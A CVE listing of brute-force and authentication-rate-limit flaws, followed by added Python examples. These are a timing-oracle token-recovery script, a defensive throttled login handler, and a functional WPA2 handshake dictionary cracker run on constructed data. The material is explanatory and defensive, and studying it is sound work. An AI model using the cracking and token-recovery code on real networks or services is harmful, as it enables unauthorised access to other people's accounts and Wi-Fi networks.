Total: 362 CVEs
CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
---|---|---|---|---|---|
CVE-2023-39960 | 1 Nextcloud | 1 Nextcloud Server | 2024-02-28 | N/A | 7.5 HIGH |
Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server starting with 25.0.0 and prior to 25.0.9 and 26.0.4, as well as Nextcloud Enterprise Server starting with 22.0.0 and prior to 22.2.10.14, 23.0.12.9, 24.0.12.5, 25.0.9, and 26.0.4, missing protection allows an attacker to brute force passwords on the WebDAV API. Nextcloud Server 25.0.9 and 26.0.4 and Nextcloud Enterprise Server 22.2.10.14, 23.0.12.9, 24.0.12.5, 25.0.9, and 26.0.4 contain patches for this issue. No known workarounds are available. | |||||
CVE-2015-20110 | 1 Jhipster | 1 Jhipster | 2024-02-28 | N/A | 7.5 HIGH |
JHipster generator-jhipster before 2.23.0 allows a timing attack against validateToken due to a string comparison that stops at the first character that differs. Attackers can guess tokens by brute forcing one character at a time and observing the timing. This drastically reduces the search space from exponential to linear: at most token length times alphabet size guesses instead of alphabet size to the power of the token length. | |||||
CVE-2022-24402 | 1 Midnightblue | 1 Tetra\ | 2024-02-28 | N/A | 7.5 HIGH |
The TETRA TEA1 keystream generator implements a key register initialization function that compresses the 80-bit key to only 32 bits for usage during the keystream generation phase, which is insufficient to safeguard against exhaustive search attacks. | |||||
CVE-2023-41350 | 1 Nokia | 2 G-040w-q, G-040w-q Firmware | 2024-02-28 | N/A | 9.8 CRITICAL |
Chunghwa Telecom NOKIA G-040W-Q has a vulnerability of insufficient measures to prevent multiple failed authentication attempts. An unauthenticated remote attacker can execute crafted JavaScript to expose the captcha in the page, making it very easy for bots to bypass the captcha check and leaving the login more susceptible to brute force attacks. | |||||
CVE-2022-43904 | 1 Ibm | 1 Security Guardium | 2024-02-28 | N/A | 7.5 HIGH |
IBM Security Guardium 11.3 and 11.4 could disclose sensitive information to an attacker due to improper restriction of excessive authentication attempts. IBM X-Force ID: 240895. | |||||
CVE-2023-36917 | 1 Sap | 1 Businessobjects Business Intelligence | 2024-02-28 | N/A | 7.5 HIGH |
SAP BusinessObjects Business Intelligence Platform - versions 420 and 430 - allows an unauthorized attacker who has hijacked a user session to bypass the victim's old password via brute force, because the password change functionality has no rate limit. Although the attack has no impact on integrity or system availability, it could allow an attacker to completely take over a victim's account. | |||||
CVE-2023-33754 | 1 Inpiazza | 1 Cloud Wifi | 2024-02-28 | N/A | 6.5 MEDIUM |
The captive portal in Inpiazza Cloud WiFi versions prior to v4.2.17 does not enforce limits on the number of attempts for password recovery, allowing attackers to brute force valid user accounts to gain access to login credentials. | |||||
CVE-2023-34243 | 1 Tgstation13 | 1 Tgstation-server | 2024-02-28 | N/A | 5.3 MEDIUM |
TGstation is a toolset to manage production BYOND servers. In affected versions, if a Windows user was registered in tgstation-server (TGS), an attacker could discover their username by brute-forcing the login endpoint with an invalid password: when a valid Windows logon was found, a distinct response was generated. This issue has been addressed in version 5.12.5. Users are advised to upgrade. Users unable to upgrade may mitigate the issue by rate-limiting API calls with software that sits in front of TGS in the HTTP pipeline, such as fail2ban. | |||||
CVE-2022-36413 | 1 Zohocorp | 1 Manageengine Adselfservice Plus | 2024-02-28 | N/A | 9.1 CRITICAL |
Zoho ManageEngine ADSelfService Plus through 6203 is vulnerable to a brute-force attack that leads to a password reset on IDM applications. | |||||
CVE-2023-33868 | 1 Piigab | 2 M-bus 900s, M-bus 900s Firmware | 2024-02-28 | N/A | 9.8 CRITICAL |
The number of login attempts is not limited. This could allow an attacker to perform a brute force on HTTP basic authentication. | |||||
CVE-2023-35172 | 1 Nextcloud | 1 Nextcloud Server | 2024-02-28 | N/A | 9.1 CRITICAL |
Nextcloud Server and Nextcloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform. In Nextcloud Server versions 25.0.0 until 25.0.7 and 26.0.0 until 26.0.2 and Nextcloud Enterprise Server versions 21.0.0 until 21.0.9.12, 22.0.0 until 22.2.10.12, 23.0.0 until 23.0.12.7, 24.0.0 until 24.0.12.2, 25.0.0 until 25.0.7, and 26.0.0 until 26.0.2, an attacker can brute force the password reset links. Nextcloud Server 25.0.7 and 26.0.2 and Nextcloud Enterprise Server 21.0.9.12, 22.2.10.12, 23.0.12.7, 24.0.12.2, 25.0.7, and 26.0.2 contain a patch for this issue. No known workarounds are available. | |||||
CVE-2023-29005 | 1 Flask-appbuilder Project | 1 Flask-appbuilder | 2024-02-28 | N/A | 7.5 HIGH |
Flask-AppBuilder versions before 4.3.0 lack rate limiting which can allow an attacker to brute-force user credentials. Version 4.3.0 includes the ability to enable rate limiting using `AUTH_RATE_LIMITED = True`, `RATELIMIT_ENABLED = True`, and setting an `AUTH_RATE_LIMIT`. | |||||
CVE-2023-1539 | 1 Answer | 1 Answer | 2024-02-28 | N/A | 5.3 MEDIUM |
Improper Restriction of Excessive Authentication Attempts in GitHub repository answerdev/answer prior to 1.0.6. | |||||
CVE-2023-25820 | 1 Nextcloud | 1 Nextcloud Server | 2024-02-28 | N/A | 7.8 HIGH |
Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform, and Nextcloud Enterprise Server is the enterprise version of the file server software. In Nextcloud Server versions 25.0.x prior to 25.0.5 and versions 24.0.x prior to 24.0.10, as well as Nextcloud Enterprise Server versions 25.0.x prior to 25.0.4, 24.0.x prior to 24.0.10, 23.0.x prior to 23.0.12.5, 22.x prior to 22.2.0.10, and 21.x prior to 21.0.9.10, an attacker who gets access to an already logged in user session can brute force the password on the confirmation endpoint. Nextcloud Server should be upgraded to 24.0.10 or 25.0.4 and Nextcloud Enterprise Server should be upgraded to 21.0.9.10, 22.2.10.10, 23.0.12.5, 24.0.10, or 25.0.4 to receive a patch. No known workarounds are available. | |||||
CVE-2022-32757 | 1 Ibm | 1 Security Directory Suite Va | 2024-02-28 | N/A | 7.5 HIGH |
IBM Security Directory Suite VA 8.0.1 through 8.0.1.19 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 228510. | |||||
CVE-2023-32319 | 1 Nextcloud | 1 Nextcloud Server | 2024-02-28 | N/A | 6.5 MEDIUM |
Nextcloud Server is an open source personal cloud implementation. Missing brute-force protection on the WebDAV endpoints via the basic auth header allowed brute-forcing user credentials when the provided user name was not an email address. Versions from 24.0.0 onward are affected. This issue has been addressed in releases 24.0.11, 25.0.5 and 26.0.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. | |||||
CVE-2023-32074 | 1 Nextcloud | 1 User Oidc | 2024-02-28 | N/A | 9.8 CRITICAL |
user_oidc app is an OpenID Connect user backend for Nextcloud. Authentication can be broken/bypassed in user_oidc app. It is recommended that the Nextcloud user_oidc app is upgraded to 1.3.2 | |||||
CVE-2022-43947 | 1 Fortinet | 2 Fortios, Fortiproxy | 2024-02-28 | N/A | 8.8 HIGH |
An improper restriction of excessive authentication attempts vulnerability [CWE-307] in the administrative interface of Fortinet FortiOS version 7.2.0 through 7.2.3 and before 7.0.10, and FortiProxy version 7.2.0 through 7.2.2 and before 7.0.8, allows an attacker with a valid user account to perform brute-force attacks on other user accounts via injecting valid login sessions. | |||||
CVE-2023-1665 | 1 Linagora | 1 Twake | 2024-02-28 | N/A | 9.8 CRITICAL |
Improper Restriction of Excessive Authentication Attempts in GitHub repository linagora/twake prior to 0.0.0. | |||||
CVE-2023-27746 | 1 Blackvue | 4 Dr750-2ch Ir Lte, Dr750-2ch Ir Lte Firmware, Dr750-2ch Lte and 1 more | 2024-02-28 | N/A | 9.8 CRITICAL |
BlackVue DR750-2CH LTE v.1.012_2022.10.26 was discovered to contain a weak default passphrase which can be easily cracked via a brute force attack if the WPA2 handshake is intercepted. | |||||
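The JHipster entry (CVE-2015-20110) describes the classic non-constant-time comparison leak. The example below is added here and is not JHipster's code: it shows the early-exit compare next to its constant-time replacement, and models the timing side channel as an oracle that reports how many leading characters matched, which is exactly what a sufficiently precise timing measurement of the vulnerable compare gives away. The token value, alphabet and the assumption that the attacker knows the token length are constructed for the demonstration. Recovery then takes at most length × alphabet guesses rather than alphabet^length.

```python
import hmac
import string

ALPHABET = string.ascii_lowercase + string.digits

# Constructed server-side secret, standing in for a validation/reset token.
SECRET_TOKEN = "k7x2pq9mz4"


def validate_token_vulnerable(candidate: str, secret: str = SECRET_TOKEN) -> bool:
    """Early-exit compare (the CWE-208 pattern): returns at the first differing
    character, so the number of iterations, and thus the response time, grows
    with the length of the correctly guessed prefix."""
    if len(candidate) != len(secret):
        return False
    for a, b in zip(candidate, secret):
        if a != b:
            return False
    return True


def validate_token_fixed(candidate: str, secret: str = SECRET_TOKEN) -> bool:
    """Constant-time compare: hmac.compare_digest's running time depends only on
    the input lengths, not on where the first mismatch occurs."""
    return hmac.compare_digest(candidate.encode(), secret.encode())


def matching_prefix_oracle(candidate: str, secret: str = SECRET_TOKEN) -> int:
    """Idealised timing oracle: what an attacker infers from timing
    validate_token_vulnerable is how many leading characters matched. It is
    modelled directly here (rather than measured) so the example is deterministic."""
    n = 0
    for a, b in zip(candidate, secret):
        if a != b:
            break
        n += 1
    return n


def recover_token(oracle, length: int, alphabet: str = ALPHABET) -> tuple[str, int]:
    """Recover the token one position at a time using the prefix oracle.
    Returns (token, number of guesses). Worst case is length * len(alphabet)
    guesses; a correct compare would force len(alphabet) ** length."""
    known = ""
    guesses = 0
    for pos in range(length):
        for ch in alphabet:
            guesses += 1
            # Pad the remaining positions with a fixed filler so only the
            # character under test can extend the matching prefix.
            trial = known + ch + alphabet[0] * (length - pos - 1)
            if oracle(trial) > pos:
                known += ch
                break
        else:
            raise RuntimeError("no character in the alphabet extended the prefix")
    return known, guesses


if __name__ == "__main__":
    token, guesses = recover_token(matching_prefix_oracle, len(SECRET_TOKEN))
    print(f"recovered {token!r} in {guesses} guesses "
          f"(full search space: {len(ALPHABET) ** len(SECRET_TOKEN)})")
    print("vulnerable accepts:", validate_token_vulnerable(token))
    print("fixed accepts:     ", validate_token_fixed(token))
```

Against a real service the oracle is noisy, so each candidate is timed many times and the median compared, but the search strategy is the same. Note that `hmac.compare_digest` still leaks whether the lengths differ; keep token lengths fixed so that is not a secret.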
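Several entries above (the unlimited HTTP basic-auth attempts in CVE-2023-33868, the username enumeration through distinct responses in CVE-2023-34243, and the missing rate limit later made configurable in Flask-AppBuilder, CVE-2023-29005) are the same CWE-307 gap seen from different angles. The login handler below is an added example, not code from any of those projects, of the minimum a practitioner would want: exponential backoff tracked both per account and per source address, a response that is byte-identical for unknown users and wrong passwords, and the same password-hashing cost for unknown users so enumeration by timing is also closed. The user table, backoff constants and clock injection are constructed for the example.

```python
import hashlib
import hmac
import time
from collections import defaultdict
from typing import Callable


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed credential store: username -> (salt, PBKDF2-HMAC-SHA256 digest).
USERS = {"alice": (b"salt-alice", _hash("correct horse battery", b"salt-alice"))}
# Dummy record so an unknown username costs the same as a known one (no timing enumeration).
_DUMMY = (b"salt-dummy", _hash("placeholder", b"salt-dummy"))

MAX_FREE_FAILURES = 5   # failures tolerated before throttling starts (illustrative)
BASE_DELAY = 2.0        # seconds; doubles with each further failure
MAX_DELAY = 900.0       # backoff cap, 15 minutes
GENERIC_ERROR = "Invalid username or password."   # identical for unknown user and bad password


class LoginThrottle:
    """Exponential backoff keyed by account AND by source address."""

    def __init__(self, clock: Callable[[], float] = time.monotonic) -> None:
        self.clock = clock
        self.failures: dict[str, int] = defaultdict(int)
        self.blocked_until: dict[str, float] = defaultdict(float)

    def retry_after(self, *keys: str) -> float:
        """Seconds until all keys are allowed again; 0 if none is throttled."""
        return max(0.0, max(self.blocked_until[k] for k in keys) - self.clock())

    def record_failure(self, *keys: str) -> None:
        for k in keys:
            self.failures[k] += 1
            over = self.failures[k] - MAX_FREE_FAILURES
            if over >= 0:
                delay = min(BASE_DELAY * 2 ** over, MAX_DELAY)
                self.blocked_until[k] = self.clock() + delay

    def record_success(self, *keys: str) -> None:
        for k in keys:
            self.failures.pop(k, None)
            self.blocked_until.pop(k, None)


def login(username: str, password: str, source_ip: str,
          throttle: LoginThrottle) -> tuple[int, str]:
    """Return (HTTP status, body). 429 carries the Retry-After value in the body."""
    account_key, ip_key = f"user:{username.lower()}", f"ip:{source_ip}"
    wait = throttle.retry_after(account_key, ip_key)
    if wait > 0:
        return 429, f"Too many attempts; retry after {wait:.0f} s"
    salt, stored = USERS.get(username, _DUMMY)
    # Always run the full PBKDF2 and a constant-time compare, even for unknown users.
    ok = hmac.compare_digest(_hash(password, salt), stored) and username in USERS
    if not ok:
        throttle.record_failure(account_key, ip_key)
        return 401, GENERIC_ERROR
    throttle.record_success(account_key, ip_key)
    return 200, f"Welcome, {username}"


if __name__ == "__main__":
    th = LoginThrottle()
    for attempt in range(7):
        print(login("alice", f"guess{attempt}", "203.0.113.7", th))
```

Keying the backoff by account alone lets an attacker lock legitimate users out; keying it by address alone is defeated by spreading guesses over many sources. Using both, with a growing delay rather than a hard lock, limits the guess rate without turning the control into a denial-of-service lever; a reverse proxy or fail2ban in front of the service, as the tgstation advisory suggests, adds the same per-address throttle at the network edge.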
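The BlackVue entry (CVE-2023-27746) is an offline attack: once a WPA2 4-way handshake is captured, every passphrase candidate can be tested locally with no rate limit at all, so the only protection is passphrase entropy. The example below is added here and is not BlackVue's code or its real default passphrase; it implements the WPA2-PSK derivation chain (PMK = PBKDF2-HMAC-SHA1 over the SSID, PTK via the 802.11i PRF, KCK = first 16 bytes, MIC = HMAC-SHA1-128 over EAPOL message 2 for key descriptor version 2) and runs a dictionary over a constructed handshake. The SSID, MAC addresses, nonces, EAPOL frame bytes and word list are all invented for the demonstration.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || B || i)
    concatenated for i = 0..3, where B = min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1 over the EAPOL-Key
    frame with its MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes        # Authenticator address (AA)
    client_mac: bytes    # Supplicant address (SPA)
    anonce: bytes
    snonce: bytes
    eapol_m2: bytes      # EAPOL-Key message 2 with the 16-byte MIC field zeroed
    mic: bytes           # MIC value read from the captured message 2


def mic_for(hs: Handshake, passphrase: str) -> bytes:
    pmk = wpa2_pmk(passphrase, hs.ssid)
    kck = wpa2_ptk(pmk, hs.ap_mac, hs.client_mac, hs.anonce, hs.snonce)[:16]
    return eapol_mic(kck, hs.eapol_m2)


def crack(hs: Handshake, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose derived MIC matches the captured one."""
    for pw in candidates:
        if not 8 <= len(pw) <= 63:      # WPA2-PSK passphrases are 8..63 ASCII characters
            continue
        if hmac.compare_digest(mic_for(hs, pw), hs.mic):
            return pw
    return None


def constructed_capture(passphrase: str = "password123") -> Handshake:
    """Constructed stand-in for a sniffed handshake; nothing here is a real BlackVue value."""
    snonce = bytes(range(32, 64))
    eapol_m2 = (
        bytes.fromhex("0103007502010a0000")   # EAPOL header, descriptor type, key info, key length
        + bytes(8) + snonce                   # replay counter, SNonce
        + bytes(16) + bytes(8) + bytes(8)     # key IV, key RSC, reserved
        + bytes(16)                           # MIC field, zeroed for the calculation
        + bytes.fromhex("0016") + bytes(22)   # key data length, RSN IE placeholder
    )
    hs = Handshake("BlackVue-example", bytes.fromhex("001122334455"),
                   bytes.fromhex("66778899aabb"), bytes(range(32)), snonce, eapol_m2, b"")
    hs.mic = mic_for(hs, passphrase)          # what the client would have sent on the air
    return hs


# Constructed word list of the kind a default-passphrase attack would start with.
WORDLIST = ["12345678", "password", "blackvue", "qwerty123", "password123", "letmein1"]

if __name__ == "__main__":
    print("recovered passphrase:", crack(constructed_capture(), WORDLIST))
```

Each candidate costs one PBKDF2 run of 4096 SHA-1 iterations, which dedicated hardware performs at hundreds of thousands of guesses per second, so any default derived from a short pattern or a device attribute falls quickly; the fix is a per-device random passphrase of sufficient length rather than anything the firmware could do after the handshake has left the antenna.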